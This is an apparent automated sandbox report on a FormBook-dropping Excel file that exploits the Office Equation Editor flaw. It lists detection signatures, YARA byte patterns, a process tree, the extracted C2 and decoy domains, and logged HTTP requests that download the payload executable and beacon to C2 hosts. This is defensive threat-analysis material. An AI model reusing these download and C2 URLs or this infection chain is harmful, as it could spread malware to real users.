
Analysis Report QTN3C2AF414EDF9_041873.xlsx

Overview

General Information

Sample Name: QTN3C2AF414EDF9_041873.xlsx
Analysis ID: 356571
MD5: 1b862193e621b4d67be94a2ec44fbf50
SHA1: 0bab9195da974524c969404430f6a58b31303322
SHA256: 709ae19031f48115d89fb3aeae68476aac8b17a1e97700c6beff820b7c54b8aa
Tags: Formbook, VelvetSweatshop, xlsx


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Connects to a URL shortener service
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2312 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 260 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2915C0AFB0B6B26A5A699965D2119F7A)
      • vbc.exe (PID: 2876 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2915C0AFB0B6B26A5A699965D2119F7A)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • ipconfig.exe (PID: 3020 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
            • cmd.exe (PID: 2952 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.856380692.xyz/nsag/"], "decoy": ["usopencoverage.com", "5bo5j.com", "deliveryourvote.com", "bestbuycarpethd.com", "worldsourcecloud.com", "glowtheblog.com", "translations.tools", "ithacapella.com", "machinerysubway.com", "aashlokhospitals.com", "athara-kiano.com", "anabittencourt.com", "hakimkhawatmi.com", "fashionwatchesstore.com", "krishnagiri.info", "tencenttexts.com", "kodairo.com", "ouitum.club", "robertbeauford.net", "polling.asia", "evoslancete.com", "4676sabalkey.com", "chechadskeitaro.com", "babyhopeful.com", "11376.xyz", "oryanomer.com", "jyxxfy.com", "scanourworld.com", "thevistadrinksco.com", "meow-cafe.com", "xfixpros.com", "botaniquecouture.com", "bkhlep.xyz", "mauriciozarate.com", "icepolo.com", "siyezim.com", "myfeezinc.com", "nooshone.com", "wholesalerbargains.com", "winabeel.com", "frankfrango.com", "patientsbooking.info", "ineedahealer.com", "thefamilyorchard.net", "clericallyco.com", "overseaexpert.com", "bukaino.net", "womens-secrets.love", "skinjunkie.site", "dccheavydutydiv.net", "explorerthecity.com", "droneserviceshouston.com", "creationsbyjamie.com", "profirma-nachfolge.com", "oasisbracelet.com", "maurobenetti.com", "mecs.club", "mistressofherdivinity.com", "vooronsland.com", "navia.world", "commagx4.info", "caresring.com", "yourstrivingforexcellence.com", "alpinevalleytimeshares.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.vbc.exe.2900000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.vbc.exe.2900000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.vbc.exe.2900000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
5.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 54.67.57.56, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2296, TargetFilename: C:\Users\Public\vbc.exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
Sigma detected: Execution in Non-Executable Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
Sigma detected: Suspicious Program Location Process Starts
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260

Signature Overview


AV Detection:

Found malware configuration
Source: 5.2.vbc.exe.400000.0.unpack | Malware Configuration Extractor: FormBook (same configuration as listed in the Malware Configuration section above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1] | ReversingLabs: Detection: 36%
Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: QTN3C2AF414EDF9_041873.xlsx | Virustotal: Detection: 33%
Source: QTN3C2AF414EDF9_041873.xlsx | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1] | Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
Source: 5.2.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.2900000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: ipconfig.pdb | source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
Source: Binary string: ipconfig.pdbN | source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb | source: vbc.exe, ipconfig.exe
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004065C1 FindFirstFileA,FindClose,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004027A1 FindFirstFileA,
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop esi
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop ebx
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop esi
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop ebx
Source: global traffic | DNS query: name: ow.ly
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 54.67.57.56:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.856380692.xyz/nsag/
Connects to a URL shortener service
Source: unknown | DNS query: name: ow.ly
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Tue, 23 Feb 2021 09:26:00 GMT | Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38 | Last-Modified: Tue, 23 Feb 2021 07:55:07 GMT | ETag: "35218-5bbfc3ca9d9e8" | Accept-Ranges: bytes | Content-Length: 217624 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload | Data Raw: [raw hex dump of the response body omitted]
Source: global traffic | HTTP traffic detected: GET /nsag/?SFN=S6to9wknRE4YQNZFkHgt/L/SBo+9VyFJxmA+r1dPkJtX1rvSVI6t0SymKIjP48fhKDCKWg==&cBb=LtD0g HTTP/1.1 | Host: www.fashionwatchesstore.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g HTTP/1.1 | Host: www.athara-kiano.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nsag/?SFN=toXeTgYrlJ3t8R2kv84tVNAusZG5KBfjoz4tCiNIzgm9lAElLlwfiIUD/nI/OmI1vpPL+Q==&cBb=LtD0g HTTP/1.1 | Host: www.overseaexpert.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 103.140.251.164
Source: Joe Sandbox View | IP Address: 54.67.57.56
Source: Joe Sandbox View | ASN Name: ASDETUKhttpwwwheficedcomGB
Source: global traffic | HTTP traffic detected: GET /omCE30rxT5x HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: ow.ly | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /receipat/winlog.exe?platform=hootsuite HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Connection: Keep-Alive | Host: algreenstdykeghestqw.dns.army
Source: C:\Windows\explorer.exe | Code function: 6_2_0293C302 getaddrinfo,setsockopt,recv,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1722339.emf
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: ow.ly
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 23 Feb 2021 09:27:26 GMT | Server: Apache | X-XSS-Protection: 1; mode=block | X-Frame-Options: SAMEORIGIN | X-Content-Type-Options: nosniff | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nsag/ was not found on this server.</p></body></html>
Source: explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2183945867.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
